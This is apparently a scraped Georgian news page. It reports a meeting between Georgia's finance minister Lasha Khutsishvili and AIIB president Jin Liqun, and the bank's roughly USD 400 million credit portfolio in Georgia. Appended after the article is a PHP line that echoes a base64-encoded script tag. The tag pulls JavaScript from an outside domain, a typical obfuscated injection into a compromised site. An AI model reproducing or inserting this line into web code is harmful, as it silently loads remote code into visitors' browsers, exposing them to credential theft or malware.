celsiusi
ავერსი საქკაბელი

 ფინანსთა მინისტრი ლაშა ხუციშვილი აზიის ინფრასტრუქტურის საინვესტიციო ბანკის (AIIB) წლიური შეხვედრის ფარგლებში, ბანკის პრეზიდენტ ჯინ ლიქუინს შეხვდა. შეხვედრას, ასევე, დაესწრო ფინანსთა მინისტრის მოადგილე ეკატერინე გუნცაძე.

ფინანსთა სამინისტროს ცნობით, მხარეებმა მიმოიხილეს ორმხრივი და მრავალმხრივი თანამშრომლობის საკითხები, ბანკის მიერ საქართველოში დაფინანსებული პროექტების მიმდინარეობა. ფინანსთა მინისტრმა AIIB-ის პრეზიდენტს გააცნო ქვეყნის ეკონომიკაში არსებული მდგომარეობა და სამომავლო პროგნოზები.

დღეის მდგომარეობით, აზიის ინფრასტრუქტურის საინვესტიციო ბანკის საკრედიტო პორტფელი საქართველოში, დაახლოებით, 400 მლნ აშშ დოლარს შეადგენს.

აზიის ინფრასტრუქტურის საინვესტიციო ბანკის (AIIB) წლიურ შეხვედრას 2024 წელს უზბეკეთის ქალაქი სამარყანდი მასპინძლობს.

104
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");